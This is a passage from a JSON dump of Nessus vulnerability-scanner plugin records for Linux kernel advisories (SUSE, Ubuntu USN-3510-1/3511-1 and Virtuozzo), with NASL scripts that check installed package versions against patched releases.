value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.90-92.50.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.90-92.50.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:02", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105106", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3510-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105106);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3510-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3510-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3510-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic-lpae\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-lowlatency\", pkgver:\"3.13.0-137.186\")) flag++;\nif 
(ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.137.146\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:07", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on-write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure"], "id": "UBUNTU_USN-3511-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3511-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105107);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3511-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. 
(CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3511-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-4.11-azure and / or linux-image-azure\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3511-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.11.0-1016-azure\", pkgver:\"4.11.0-1016.16\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-azure\", pkgver:\"4.11.0.1016.16\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.11-azure / linux-image-azure\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:20", "description": "According to the versions of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-18T00:00:00", "title": "Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-114)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-16939"], "modified": "2017-12-18T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:vzkernel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel"], "id": "VIRTUOZZO_VZA-2017-114.NASL", "href": "https://www.tenable.com/plugins/nessus/105324", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105324);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-114)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. 
A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2910907\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected parallels-server-bm-release / vzkernel / etc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"parallels-server-bm-release-6.0.12-3689\",\n \"vzkernel-2.6.32-042stab126.2\",\n \"vzkernel-devel-2.6.32-042stab126.2\",\n \"vzkernel-firmware-2.6.32-042stab126.2\",\n \"vzmodules-2.6.32-042stab126.2\",\n \"vzmodules-devel-2.6.32-042stab126.2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"parallels-server-bm-release / vzkernel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:38:56", 
"description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver\nsubsystem in the Linux kernel. A local attacker could use this to\npossibly gain administrative privileges. (CVE-2017-12146).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3508-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "cpe:/o:canonical:ubuntu_linux:17.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic", 